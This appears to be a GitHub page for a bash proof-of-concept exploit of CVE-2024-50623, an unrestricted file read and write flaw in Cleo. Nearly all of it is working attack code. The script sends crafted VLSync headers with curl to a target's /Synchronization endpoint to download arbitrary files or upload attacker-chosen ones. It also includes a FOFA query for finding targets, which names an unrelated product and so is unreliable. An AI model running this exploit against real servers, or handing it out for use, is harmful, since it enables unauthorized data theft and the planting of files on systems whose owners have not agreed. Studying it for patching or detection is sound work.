-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathcve-2024-50623.sh
149 lines (125 loc) · 4.02 KB
/
cve-2024-50623.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
# CVE-2024-50623 POC - Cleo Unrestricted file upload and download
# FOFA body="packages/partnerlogos/userportal_logo" && title="KACE Systems Management Appliance Service Center"
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# My Shop https://buymeacoffee.com/verylazytech/extras
# https://www.verylazytech.com
#!/usr/bin/env bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ _ _ ____ ___ __ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | ___| / _ \ / /_|___ \|___ /
| | \ \ / /| _| __) | | | |__) | || |_ |___ \| | | | '_ \ __) | |_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| ___) | |_| | (_) / __/ ___) |
\____| \_/ |_____| |_____\___/_____| |_| |____/ \___/ \___/_____|____/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Function to print usage
usage() {
echo "Usage: $0 -t <target_url> -a <read|write> -f <file_path> [--w <local_file_to_write>] [--proxy <proxy_url>]"
exit 1
}
# Parse arguments
while [ $# -gt 0 ]; do
case "$1" in
-t)
TARGET="$2"
shift
shift
;;
-a)
ACTION="$2"
shift
shift
;;
-f)
WHERE="$2"
shift
shift
;;
-w)
WHAT="$2"
shift
shift
;;
--proxy)
PROXY="$2"
shift
shift
;;
*)
usage
;;
esac
done
# Check required arguments
if [ -z "$TARGET" ] || [ -z "$ACTION" ] || [ -z "$WHERE" ]; then
usage
fi
# Validate URL format
if ! echo "$TARGET" | grep -qE '^https?://'; then
echo "[ERROR] Invalid URL format for target"
exit 1
fi
# Validate file existence for write action
if [ "$ACTION" = "write" ] && [ ! -f "$WHAT" ]; then
echo "[ERROR] File $WHAT does not exist or is not readable"
exit 1
fi
TARGET=${TARGET%/} # Remove trailing slash if present
printf "\033[0;32mAttempting to exploit CVE-2024-50623...\033[0m\n"
# Function for logging
log() {
local level="$1"
local message="$2"
echo "[$(date +'%Y-%m-%d %H:%M:%S')] [$level] $message" | tee -a exploit.log
}
# Extract version function
extract_version() {
curl -s -k ${PROXY:+--proxy "$PROXY"} "$1/Synchronization" | grep -oP 'Server: .*?/\K[^ ]+'
}
read_file() {
local target_version=$(extract_version "$1")
local headers="VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=${target_version};a=1337;po=1337;s=True;b=False;pp=1337;path=$2"
# Fetch the file and log the action
curl -s -k ${PROXY:+--proxy "$PROXY"} -H "$headers" "$1/Synchronization" | tee -a exploit.log
log INFO "Reading file: $2"
}
write_file() {
local target_version=$(extract_version "$1")
local headers="VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=${target_version};a=1337;po=1337;s=True;b=False;pp=1337;path=$2"
# Send the file data and log the action
curl -s -k ${PROXY:+--proxy "$PROXY"} -H "$headers" --data-binary "@$3" "$1/Synchronization" | tee -a exploit.log
log INFO "Writing file: $2 with data from $3"
}
# Perform actions
case "$ACTION" in
read)
log INFO "Action: READ. Target: $TARGET, File: $WHERE"
read_file "$TARGET" "$WHERE"
;;
write)
if [[ -z "$WHAT" ]]; then
log ERROR "--what is required for write action"
exit 1
fi
log INFO "Action: WRITE. Target: $TARGET, File: $WHERE, Data: $WHAT"
write_file "$TARGET" "$WHERE" "$WHAT"
;;
*)
log ERROR "Invalid action"
usage
;;
esac
# Output formatting
printf "\n\033[1;33m--- Exploit Complete ---\033[0m\n"